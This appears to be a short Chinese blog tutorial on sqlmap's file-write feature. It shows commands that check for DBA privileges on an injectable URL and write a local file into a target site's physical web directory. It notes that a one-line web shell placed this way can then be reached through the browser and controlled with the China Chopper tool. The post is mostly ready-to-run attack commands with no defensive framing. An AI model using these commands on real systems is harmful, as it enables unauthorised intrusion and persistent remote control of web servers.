file参数使用

权限:必须为dba权限

file-write 从本地写入

file-dest 写入目标路径

判断是否是dba权限(显示TRUE或者FALSE,TRUE即为dba权限,反之不是)

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --is-dba

写入文件至站点目录

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=本地文件路径 --file-dest 网站路径(写入路径)+"/写入的文件名"

sqlmap.py -u "http://www.xx.com/aa.aspx?id=123" --file-write=F:/a.aspx --file-dest D:/虚拟目录/Front/cx.aspx
D:/虚拟目录/Front   为网站的物理路径

写入成功后,即可通过浏览器访问,若为一句话木马则可使用中国菜刀进行连接。

注:网站路径必须为网站的真实物理路径(即绝对路径。也就是从盘符开始的路径),否则无法写入数据。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值